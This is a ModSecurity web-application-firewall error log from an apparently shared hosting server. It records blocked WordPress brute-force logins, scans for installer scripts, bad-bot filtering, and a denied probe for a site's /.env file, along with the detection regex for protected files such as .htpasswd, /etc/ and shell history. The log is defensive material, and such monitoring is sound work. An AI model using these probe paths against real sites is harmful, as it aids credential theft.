[Tue May 26 16:27:15.321978 2026] [security2:error] [pid 795941:tid 796157] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8iu2GQ_TLE_VHIp2pLgAAANs"]
[Tue May 26 16:27:19.161175 2026] [security2:error] [pid 795941:tid 796126] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8jO2GQ_TLE_VHIp2pawAAALw"]
[Tue May 26 16:27:20.340705 2026] [security2:error] [pid 795941:tid 796180] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8j-2GQ_TLE_VHIp2phwAAAPI"]
[Tue May 26 16:27:20.684246 2026] [security2:error] [pid 795941:tid 796160] [client 104.28.163.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV8kO2GQ_TLE_VHIp2ppQAAAN4"]
[Tue May 26 16:27:21.822047 2026] [security2:error] [pid 795941:tid 796179] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8kO2GQ_TLE_VHIp2pogAAAPE"]
[Tue May 26 16:27:24.359065 2026] [security2:error] [pid 795941:tid 796077] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8ku2GQ_TLE_VHIp2pzQAAAIs"]
[Tue May 26 16:27:26.397959 2026] [security2:error] [pid 795941:tid 796153] [client 172.98.32.45:62743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV8lu2GQ_TLE_VHIp2qFgAAANc"]
[Tue May 26 16:27:26.518818 2026] [security2:error] [pid 795941:tid 796160] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8le2GQ_TLE_VHIp2qAwAAAN4"]
[Tue May 26 16:27:27.688280 2026] [security2:error] [pid 795941:tid 795991] [remote 95.216.117.13:41148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV8l-2GQ_TLE_VHIp2qNQAApTE"]
[Tue May 26 16:27:27.985633 2026] [security2:error] [pid 795941:tid 796098] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8lu2GQ_TLE_VHIp2qHQAAAKA"]
[Tue May 26 16:27:29.557212 2026] [security2:error] [pid 795941:tid 795986] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8me2GQ_TLE_VHIp2qUAAA5Sw"]
[Tue May 26 16:27:29.557413 2026] [security2:error] [pid 795941:tid 796167] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8me2GQ_TLE_VHIp2qUAAA5Sw"]
[Tue May 26 16:27:30.666542 2026] [security2:error] [pid 795941:tid 796182] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8me2GQ_TLE_VHIp2qTAAAAPQ"]
[Tue May 26 16:27:32.520828 2026] [security2:error] [pid 795941:tid 796129] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8m-2GQ_TLE_VHIp2qdwAAAL8"]
[Tue May 26 16:27:33.572924 2026] [security2:error] [pid 795941:tid 796118] [client 193.58.104.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8ne2GQ_TLE_VHIp2qlgAAALQ"], referer: https://www.anujtradingco.com/
[Tue May 26 16:27:33.614045 2026] [security2:error] [pid 795941:tid 796149] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8ne2GQ_TLE_VHIp2qjQAAANM"]
[Tue May 26 16:27:34.052942 2026] [security2:error] [pid 795941:tid 796087] [client 85.208.96.209:15278] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahV8nu2GQ_TLE_VHIp2qmgAAAJU"]
[Tue May 26 16:27:34.053071 2026] [security2:error] [pid 795941:tid 796087] [client 85.208.96.209:15278] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahV8nu2GQ_TLE_VHIp2qmgAAAJU"]
[Tue May 26 16:27:34.466945 2026] [security2:error] [pid 795941:tid 796184] [client 193.58.104.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8nu2GQ_TLE_VHIp2qqQAAAPY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1224629&moderation-hash=80c3f33234fb0ed4f5b5fe76d932cc1f
[Tue May 26 16:27:35.292095 2026] [security2:error] [pid 795941:tid 796135] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8nu2GQ_TLE_VHIp2qtQAAAMU"]
[Tue May 26 16:27:35.914707 2026] [security2:error] [pid 795941:tid 796148] [client 14.191.26.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8n-2GQ_TLE_VHIp2qvQAAANI"]
[Tue May 26 16:27:36.177148 2026] [security2:error] [pid 795941:tid 796160] [client 54.205.63.235:65356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q0gAAAN4"]
[Tue May 26 16:27:36.241261 2026] [security2:error] [pid 795941:tid 796098] [client 54.205.63.235:50720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q1AAAAKA"]
[Tue May 26 16:27:36.241303 2026] [security2:error] [pid 795941:tid 796087] [client 54.205.63.235:50719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q0wAAAJU"]
[Tue May 26 16:27:36.241333 2026] [security2:error] [pid 795941:tid 796165] [client 54.205.63.235:50722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q1QAAAOM"]
[Tue May 26 16:27:36.242178 2026] [security2:error] [pid 795941:tid 796147] [client 54.205.63.235:50723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q1wAAANE"]
[Tue May 26 16:27:36.242231 2026] [security2:error] [pid 795941:tid 796174] [client 54.205.63.235:50721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q1gAAAOw"]
[Tue May 26 16:27:36.242564 2026] [security2:error] [pid 795941:tid 796087] [client 54.205.63.235:50724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q2QAAAJU"]
[Tue May 26 16:27:36.242671 2026] [security2:error] [pid 795941:tid 796102] [client 54.205.63.235:50726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q2gAAAKQ"]
[Tue May 26 16:27:36.242845 2026] [security2:error] [pid 795941:tid 796078] [client 54.205.63.235:50725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q2AAAAIw"]
[Tue May 26 16:27:36.243003 2026] [security2:error] [pid 795941:tid 796072] [client 54.205.63.235:50727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q3AAAAIY"]
[Tue May 26 16:27:36.243036 2026] [security2:error] [pid 795941:tid 796196] [client 54.205.63.235:50729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q3QAAAQI"]
[Tue May 26 16:27:36.243152 2026] [security2:error] [pid 795941:tid 796170] [client 54.205.63.235:50728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q2wAAAOg"]
[Tue May 26 16:27:36.243223 2026] [security2:error] [pid 795941:tid 796084] [client 54.205.63.235:50731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q3wAAAJI"]
[Tue May 26 16:27:36.243253 2026] [security2:error] [pid 795941:tid 796174] [client 54.205.63.235:50730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q3gAAAOw"]
[Tue May 26 16:27:36.243289 2026] [security2:error] [pid 795941:tid 796089] [client 54.205.63.235:50732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q4AAAAJc"]
[Tue May 26 16:27:36.305918 2026] [security2:error] [pid 795941:tid 796074] [client 54.205.63.235:50735] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahV8oO2GQ_TLE_VHIp2q4wAAAIg"]
[Tue May 26 16:27:37.817833 2026] [security2:error] [pid 795941:tid 796180] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8oe2GQ_TLE_VHIp2q9gAAAPI"]
[Tue May 26 16:27:40.700512 2026] [security2:error] [pid 795941:tid 796103] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8o-2GQ_TLE_VHIp2rLAAAAKU"]
[Tue May 26 16:27:42.239657 2026] [security2:error] [pid 795941:tid 796166] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8pe2GQ_TLE_VHIp2rUAAAAOQ"]
[Tue May 26 16:27:42.450993 2026] [security2:error] [pid 795941:tid 796133] [client 27.147.191.110:61665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.191.147.27.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV8pu2GQ_TLE_VHIp2rWgAAAMM"]
[Tue May 26 16:27:43.947978 2026] [security2:error] [pid 795941:tid 796196] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8p-2GQ_TLE_VHIp2rdgAAAQI"]
[Tue May 26 16:27:45.335832 2026] [security2:error] [pid 795941:tid 796192] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8qO2GQ_TLE_VHIp2rlQAAAP4"]
[Tue May 26 16:27:47.062373 2026] [security2:error] [pid 795941:tid 796096] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8qu2GQ_TLE_VHIp2rtwAAAJ4"]
[Tue May 26 16:27:49.760079 2026] [security2:error] [pid 795941:tid 796144] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8re2GQ_TLE_VHIp2r6QAAAM4"]
[Tue May 26 16:27:49.954743 2026] [security2:error] [pid 795941:tid 795980] [remote 54.36.102.244:49794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV8re2GQ_TLE_VHIp2r8AAAiyY"]
[Tue May 26 16:27:51.920078 2026] [security2:error] [pid 795941:tid 796115] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8r-2GQ_TLE_VHIp2sEAAAALE"]
[Tue May 26 16:27:53.705839 2026] [security2:error] [pid 795941:tid 796006] [remote 13.203.52.35:54526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.52.203.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV8se2GQ_TLE_VHIp2sSgAA6kA"]
[Tue May 26 16:27:53.802901 2026] [security2:error] [pid 795941:tid 796022] [remote 51.91.98.45:34178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV8se2GQ_TLE_VHIp2sSwAAllA"]
[Tue May 26 16:27:54.248610 2026] [security2:error] [pid 795941:tid 796099] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8se2GQ_TLE_VHIp2sRwAAAKE"]
[Tue May 26 16:27:54.251191 2026] [security2:error] [pid 795941:tid 796169] [client 62.60.130.233:56985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.elephoneindia.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahV8su2GQ_TLE_VHIp2sUgAAAOc"]
[Tue May 26 16:27:54.604591 2026] [security2:error] [pid 795941:tid 796125] [client 62.60.130.233:55622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.elephoneindia.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahV8su2GQ_TLE_VHIp2sXQAAALs"], referer: https://www.reddit.com/
[Tue May 26 16:27:55.316574 2026] [security2:error] [pid 795941:tid 796179] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8su2GQ_TLE_VHIp2sYAAAAPE"]
[Tue May 26 16:27:55.341217 2026] [security2:error] [pid 795941:tid 796082] [client 94.26.106.90:63663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahV8s-2GQ_TLE_VHIp2scQAAAJA"]
[Tue May 26 16:27:55.730238 2026] [security2:error] [pid 795941:tid 796126] [client 94.26.106.90:51016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahV8s-2GQ_TLE_VHIp2sfwAAALw"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 16:27:58.189604 2026] [security2:error] [pid 795941:tid 796072] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8te2GQ_TLE_VHIp2srAAAAIY"]
[Tue May 26 16:27:58.294671 2026] [security2:error] [pid 795941:tid 796138] [client 62.60.130.228:59081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahV8tu2GQ_TLE_VHIp2sxgAAAMg"], referer: https://t.co/
[Tue May 26 16:27:58.625525 2026] [security2:error] [pid 795941:tid 796137] [client 62.60.130.228:64874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahV8tu2GQ_TLE_VHIp2s0QAAAMc"]
[Tue May 26 16:27:58.643839 2026] [security2:error] [pid 795941:tid 796112] [client 176.65.139.234:36676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "haddingtonwines.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahV8tu2GQ_TLE_VHIp2s0gAAAK4"]
[Tue May 26 16:27:58.984095 2026] [security2:error] [pid 795941:tid 796166] [client 85.208.96.201:55136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahV8tu2GQ_TLE_VHIp2s4AAAAOQ"]
[Tue May 26 16:27:58.984206 2026] [security2:error] [pid 795941:tid 796166] [client 85.208.96.201:55136] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahV8tu2GQ_TLE_VHIp2s4AAAAOQ"]
